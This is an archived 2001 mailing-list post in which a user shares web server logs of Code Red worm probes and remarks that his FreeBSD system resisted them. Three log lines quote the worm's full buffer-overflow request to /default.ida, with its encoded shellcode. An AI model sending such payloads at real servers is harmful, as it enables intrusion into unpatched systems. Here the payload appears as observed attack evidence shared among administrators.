code red

From: Bill Pechter <pechter_at_bg-tc-ppp1175.monmouth.com>
Date: Mon Jul 23 16:44:25 2001

> It was thus said that the Great Douglas Quebbeman once stated:
> >
> > Just testing, hoping that CodeRed didn't silence everyone...
>
> Nope. But I did see some affected boxes try to get into my webserver
> (running on 10yo hardware BTW 8-). Not that they did (since I don't run
> Microsoft IIS).
>
> -spc (Perhaps people were busy out and about collecting systems ... )

Here's the logs from my file... notice the attempt at the old buffer
overflow stack smash.

Didn't work here. FreeBSD 4.3-STABLE #0: Sat Jul 21 00:45:37 EDT 2001

They got stuff hacked _at_ Southern New England Telephone..., Cap Gemini in
France, MediaOne...


Bill

log files...

[Thu Jul 19 19:26:01 2001] [error] [client 165.247.154.65] File does not exist: /usr/local/www/data/default.ida


221.191.252.64.snet.net - - [19/Jul/2001:15:09:17 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
pc21.224.3.194.capgemini.fr - - [19/Jul/2001:15:16:21 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
we-66-74-140-152.we.mediaone.net - - [19/Jul/2001:16:21:36 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 205 "-" "-"
---
  Bill Gates is a Persian cat and a monocle away from being a 
  villain in a James Bond movie              -- Dennis Miller 
  bpechter_at_shell.monmouth.com|pechter_at_pechter.dyndns.org
Received on Mon Jul 23 2001 - 16:44:25 BST

This archive was generated by hypermail 2.3.0 : Fri Oct 10 2014 - 23:33:53 BST